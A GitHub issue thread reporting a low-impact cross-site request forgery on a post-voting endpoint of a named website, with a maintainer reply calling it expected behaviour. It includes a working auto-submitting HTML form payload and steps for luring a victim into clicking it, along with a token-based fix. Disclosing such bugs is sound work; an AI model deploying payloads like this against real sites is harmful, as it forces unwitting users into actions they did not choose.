### ISSUE TITLE
CSRF at /index.php?vote=1&postID=ID

### ISSUE THREAD

**Issue by rondons** [The-XSS-Rat/HD-issues#6]
The application lacks protection against Cross-Site Request Forgery (CSRF). This particular CSRF is of low impact, but still present. It allows a user to craft a CSRF payload that will make others forcefully vote on a post. There is also no downvote option yet to undo this action.

Steps to reproduce:
1- Craft the following payload and save it:

```
<html>
    <body>
        <form action="https://hackerats.com/index.php?vote=1&postID=168" method="POST">
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>
```
2- serve it on a webserver
3- send the link to someone else.
4- if they click on it, the CSRF is executed and they vote on the post with the give postID.

![image](https://user-images.githubusercontent.com/73745039/164982571-e9533dd2-259e-4d46-83cd-2cb7f8bd4d42.png)

Recommendations:
Implement Synchronizer Token Pattern. These are random tokens that are validated by the application, and unpredictable by an attacker.

**Comment by The-XSS-Rat** [comment]
This is a link and not a form, expected behaviour
